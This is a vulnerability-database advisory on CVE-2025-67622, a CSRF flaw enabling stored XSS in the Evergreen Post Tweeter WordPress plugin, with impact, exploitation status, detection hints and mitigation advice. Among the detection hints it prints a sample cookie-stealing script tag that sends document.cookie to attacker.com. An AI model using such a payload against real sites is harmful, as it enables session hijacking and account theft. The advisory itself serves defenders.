
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67622 is a Cross-Site Request Forgery (CSRF) vulnerability in the Evergreen Post Tweeter WordPress plugin (by titopandub) that enables Stored Cross-Site Scripting (XSS). It affects all versions of the plugin up to and including 1.8.9. The vulnerability was published on December 24, 2025, and was assigned by Patchstack. It carries a CVSS v3.1 base score of 8.8 (High) (Red Hat CVE, Feedly).
The root cause is classified as CWE-352 (Cross-Site Request Forgery), where the plugin fails to implement adequate CSRF token validation on sensitive administrative requests. An attacker can craft a malicious web page or link that, when visited by an authenticated WordPress administrator or privileged user, silently submits a forged request to the plugin's endpoint. Because the request carries the victim's valid session credentials, the plugin processes it without verification, allowing the attacker to inject and persistently store malicious JavaScript (Stored XSS) within the WordPress site. No authentication is required on the attacker's side; only user interaction (visiting a malicious page) is needed (Patchstack).
Successful exploitation allows an attacker to inject persistent malicious scripts into the WordPress site, which execute in the browsers of any user who subsequently visits affected pages. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or further compromise of site visitors. The high confidentiality, integrity, and availability impact scores reflect the potential for full site takeover when an administrator is targeted (Red Hat CVE, Feedly).
There is currently no public proof-of-concept exploit code and no evidence of in-the-wild exploitation. The EPSS score is approximately 0.018%, indicating a low probability of exploitation in the near term. No threat actor attribution has been made, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in a plugin configuration field.wp-admin/admin-post.php or wp-admin/options-general.php?page=evergreen-post-tweeter) from unusual referrers or external origins.<script> tags stored in WordPress options or plugin configuration rows in the wp_options table associated with the Evergreen Post Tweeter plugin.Users should update the Evergreen Post Tweeter plugin to a version beyond 1.8.9 as soon as a patched release is available from the plugin author (titopandub). If the plugin is not critically needed, it should be disabled or removed immediately. As interim mitigations, administrators can deploy a WordPress security plugin (e.g., Wordfence, iThemes Security) that provides additional CSRF protection, and should educate users about not clicking unknown links while authenticated to WordPress. Regularly auditing all installed plugins and keeping WordPress core updated is also recommended (Feedly, Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."